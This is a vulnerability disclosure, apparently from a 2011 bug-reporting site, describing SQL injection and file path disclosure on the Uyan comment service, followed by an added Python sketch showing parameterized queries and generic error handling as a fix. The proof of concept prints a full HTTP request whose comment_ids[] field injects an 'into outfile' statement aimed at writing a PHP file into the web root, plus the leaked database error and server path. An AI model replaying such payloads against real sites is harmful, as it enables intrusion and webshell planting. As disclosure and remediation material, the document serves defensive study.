Uyan (友言) Has SQL Injection and File Path Disclosure

Author: hack1990  Date: 11-10-22  Views: 644

Brief description:

http://uyan.cc is a newly founded community-commenting startup; lax filtering of SQL input leads to this vulnerability.

Details:

http://uyan.cc/index.php/youyan_content/getRepliesTogether/time does not filter the POSTed data. In addition, http://uyan.cc/index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8% discloses the file path.

However, because the database and web servers are separate, getting a webshell directly via into outfile is difficult.

Proof of vulnerability:

POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1
Host: uyan.cc
Connection: keep-alive
Content-Length: 723
Origin: http://uyan.cc
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://uyan.cc/index.php/youyan?pageId=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&domain=www.36kr.coma'%20&&%20'1'='2&master_id=2711%20&&%201=2&title=''''''-1&url=-1&pageImg=;%3C/javascript%3E&pageContent=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=97ipt9bjm2otbd7j2cphg84444

comment_ids%5B%5D=168019&comment_ids%5B%5D=168031 and (select '11111' into outfile '//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php' )=1&comment_ids%5B%5D=168020&comment_ids%5B%5D=168032&comment_ids%5B%5D=168007&comment_ids%5B%5D=168006&comment_ids%5B%5D=167967&comment_ids%5B%5D=167985&comment_ids%5B%5D=167986&comment_ids%5B%5D=167987&page=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&delStyle=0&reply_page_no%5B167967%5D=0&reply_page_no%5B167985%5D=0&reply_page_no%5B167986%5D=0&reply_page_no%5B167987%5D=0&reply_page_no%5B168006%5D=0&reply_page_no%5B168007%5D=0&reply_page_no%5B168019%5D=0&reply_page_no%5B168020%5D=0&reply_page_no%5B168031%5D=0&reply_page_no%5B168032%5D=0&session_name=uyan_www.36kr.com

<body>
       <div id="content">
              <h1>A Database Error Occurred</h1>
              <p>Error Number: 1064</p><p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1=1 order by comment.time desc limit 0, 3' at line 3</p><p>select user.*, comment.* from comment
          LEFT JOIN user ON user.user_id = comment.user_id
          where comment.del=0 and comment.reply_to_comment_id=168031 and '1=1 order by comment.time desc limit 0, 3</p><p>Filename: /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php</p><p>Line Number: 251</p>     </div>
</body>
</html>
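As an added example that is not part of the original report or of Uyan's code, the following Python sketch shows how a handler like getRepliesTogether could validate the comment_ids[] values, bind the reply query seen in the error page instead of concatenating it, and return a generic error body rather than the debug page that leaks the model's filename and line number. SQLite stands in for MySQL, and the table columns and sample rows are constructed.

```python
import re
import sqlite3

# Assumption: comment ids are positive integers (the report's values are 6-digit ints)
_ID_RE = re.compile(r"^[1-9][0-9]{0,17}$")

def parse_comment_ids(values):
    """Return validated ids or raise ValueError. The original endpoint concatenated
    comment_ids[] into SQL, so "168031 and (select ...)=1" changed the query."""
    ids = []
    for raw in values:
        if not _ID_RE.match(raw):
            raise ValueError("malformed comment_ids[] value")
        ids.append(int(raw))
    return ids

def fetch_replies(conn, comment_id, limit=3):
    """Same shape as the query in the leaked error page, with bound parameters."""
    sql = ("SELECT user.name, comment.text FROM comment "
           "LEFT JOIN user ON user.user_id = comment.user_id "
           "WHERE comment.del = 0 AND comment.reply_to_comment_id = ? "
           "ORDER BY comment.time DESC LIMIT 0, ?")
    return conn.execute(sql, (comment_id, limit)).fetchall()

def handle_request(conn, form):
    """Web layer: bad input -> 400 with a generic body; DB failures -> 500 with a
    generic body. The MySQL message, filename and line number shown in the
    report's response belong in the server log only, never in the HTTP body."""
    try:
        ids = parse_comment_ids(form.get("comment_ids[]", []))
    except ValueError:
        return 400, {"error": "invalid request"}
    try:
        return 200, {str(i): fetch_replies(conn, i) for i in ids}
    except sqlite3.Error:
        return 500, {"error": "internal error"}

def build_db():
    """Constructed sample data mirroring the tables named in the leaked query."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user(user_id INTEGER, name TEXT);
        CREATE TABLE comment(comment_id INTEGER, user_id INTEGER,
            reply_to_comment_id INTEGER, del INTEGER, time INTEGER, text TEXT);
        INSERT INTO user VALUES (1, 'alice'), (2, 'bob');
        INSERT INTO comment VALUES (1, 1, 168031, 0, 10, 'first reply'),
            (2, 2, 168031, 0, 20, 'second reply'), (3, 1, 168031, 1, 30, 'deleted');
    """)
    return conn
```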
